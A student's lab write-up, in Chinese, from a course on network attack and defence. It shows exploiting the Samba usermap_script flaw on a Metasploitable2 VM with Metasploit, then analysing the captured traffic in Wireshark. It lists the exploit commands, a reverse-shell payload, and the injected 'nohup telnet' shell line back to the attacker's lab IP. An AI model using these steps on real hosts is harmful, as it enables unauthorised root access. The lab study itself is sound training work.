20231911 马星 2023-2024-2 《网络攻防实践》第7周作业

1.实践内容
1.1 实践任务:
1.1.1 使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。
1.1.2 实践作业:攻防对抗实践

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

1.2 Linux操作系统基本框架

首先,Linux可划分为以下四个部分:
①Linux内核
②GNU工具
③Linux桌面环境
④应用软件

Linux系统的核心是内核。内核控制着计算机系统上的所有硬件和软件,在必要时分配硬件,并根据需要执行软件。
·操作系统内核的主要功能之一就是内存管理。内核不仅管理服务器上的可用物理内存,还可以创建和管理虚拟内存(即实际并不存在的内存)。
·Linux操作系统将运行中的程序称为进程。进程可以在前台运行,将输出显示在屏幕上,也可以在后台运行,隐藏到幕后。
·内核控制着Linux系统如何管理运行在系统上的所有进程。内核的另一职责是管理硬件设备。任何Linux系统需要与之通信的设备,都需要在内核代码中加入其驱动程序代码。
1.3 Linux系统远程攻防技术

远程口令字猜测攻击:
通过前面提到的服务嗅探用户账户名或者使用缺省内件账户的用户名进行密码猜测。
口令字猜测攻击通常针对使用弱口令的的账户破解。
除了SSH网络服务之外,还可以通过对HTTP/HTTPS、FTP等用于自己账户体系和身份认证机制的网络服务进行猜测。
口令猜测的常用工具如下:Brutus、THC Hydra、Cain and Abel等工具。
防御远程口令猜测技术:
确保每个用户都有自己的有效账户和口令字,而不是使用一个账户。
特权账户应避免远程直接登录,只能在本地登录。
口令长度至少达到8位,包含字母、数字和标点符号。
对多次认证失败进行纪录,并在多次无效登录之后断掉连接
不要再自己登录的所有系统上都使用相同的口令字
并要笔录自己的口令字
使用基于公开密钥证书的身份认证机制。
修改网络服务的默认端口。

2.实践过程
2.1 使用Metasploit进行Linux远程渗透攻击

虚拟机IP地址
kali192.168.200.2
Metasploitable2-Linux192.168.200.123

1.测试连通性:
在Kali虚拟机上ping Metasploitable2-Linux虚拟机的IP地址192.168.200.123,测试其连通性:
如图所示,虚拟机间正常联通。
在这里插入图片描述在Metasploitable2-Linux虚拟机上ping Kali虚拟机的IP地址192.168.200.2,如图所示,虚拟机间正常联通。
在这里插入图片描述2.在Kali虚拟机中输入指令:nmap -T4 192.168.200.123:
查看Metasploitable2-Linux使用的端口;
由图可知Metasploitable2-Linux开放tcp端口有:21、22、23、25端口等
在这里插入图片描述3.在kali虚拟机中使用指令msfconsole打开渗透软件metasploit:
在这里插入图片描述在这里插入图片描述4.输入指令:use exploit/multi/samba/usermap_script,查看攻击载荷并设置攻击载荷:
在这里插入图片描述输入指令:show payloads显示有效的攻击载荷:
在这里插入图片描述5.输入指令set payload cmd/unix/reverse 选择攻击PAYLOAD,反向连接
在这里插入图片描述在Kali虚拟机中输入指令 set LHOST 192.168.200.2,进行攻击机IP地址设置:
在这里插入图片描述在Kali虚拟机中输入指令 set RHOST 192.168.200.123 进行靶机IP地址设置:
在这里插入图片描述在上述设置完成后,输入指令:exploit 进行攻击:
在这里插入图片描述
6.通过 whoami 查询,发现我们已经获得了root权限,这表明提权成功。
在这里插入图片描述2.2 攻防对抗实践

由于攻击过程上面已给出,故不再赘述,下面主要对Wireshark抓包内容进行分析:

攻击方IP:192.168.200.2
防守方IP:192.168.200.123
在这里插入图片描述1.使用Wireshark进行抓包分析,可以得到攻击者的IP地址为192.168.200.2,目标IP为192.168.200.123,目标端口为49568。
在这里插入图片描述2.可以查看到TCP建立连接时间:
在这里插入图片描述3.接着可以查看到SMB数据包中的shellcode:
其中,nohup是no hang up的缩写,意思是不挂断,用nohup运行命令可以使命令永久的执行下去,和用户终端没有关系;telnet 192.168.200.2 4444示通过4444号端口将数据传入攻击机。2&>1表示的是linux中的文件号。1代表标准输出流,2为错误输出流,&>表示合并标准输出和错误输出且重定向。
在这里插入图片描述3.追踪TCP包的TCP数据流,可以看到攻击成功之后还执行了哪些命令:
在这里插入图片描述3.学习中遇到的问题及解决

问题:在进行渗透攻击时,攻击方无法ping通防守方的ip
解决方法:将kali攻击机设置成桥接模式,这样就可以让攻击机与靶机在同一网段内,以便渗透攻击的顺利进行。
4.实践总结

本次实践主要学习了Linux操作系统攻防,以及渗透攻击的攻击过程,深刻理解了网络攻防的一般步骤,同时还要多加强理论知识的学习,并投入大量时间去实践,才能把网络攻防技术掌握的更好。

  • 17
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值